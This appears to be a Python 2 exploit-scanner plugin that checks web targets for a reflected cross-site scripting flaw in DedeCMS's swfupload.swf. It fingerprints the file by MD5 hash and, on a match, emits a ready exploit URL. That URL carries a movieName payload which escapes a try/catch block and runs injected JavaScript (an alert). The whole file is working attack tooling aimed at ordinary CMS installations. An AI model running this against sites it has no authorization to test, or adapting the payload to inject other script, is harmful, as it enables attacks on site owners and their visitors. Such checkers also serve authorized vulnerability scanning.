#! /usr/bin/env python
# -*- coding: utf-8 -*-

import urllib2
import md5
class Exploit:
    name = u"dedecms swfupload.swf反射xss"
    def __init__(self,target,expfile):
        self.target = target
        self.result = {
            "name": "DeDeCMS swfupload.swf反射xss",
            "author": "Lcy",
            "type": "website",
            "ref": "https://phpinfo.me",
            "status":False,
            "info":"",
            'filename':expfile+ ".py",
            "target":target,
        }
    def verify(self):
        flash_md5 = "3a1c6cc728dddc258091a601f28a9c12"
        file_path = "/images/swfupload/swfupload.swf"
        expurl = self.target + "/images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28%22xss%22%29}}//"
        try:
            file_url = self.target+file_path
            req = urllib2.Request(file_url)
            res = urllib2.urlopen(req,timeout=3)
            file_content = res.read()
            md5_value = md5.new(file_content).hexdigest()
            if md5_value in flash_md5:
                self.result['status'] = True
                self.result['info'] = "%s存在dedecms swfupload反射xss，验证url:%s" % (self.target,expurl)
        except Exception,e :
            pass
                            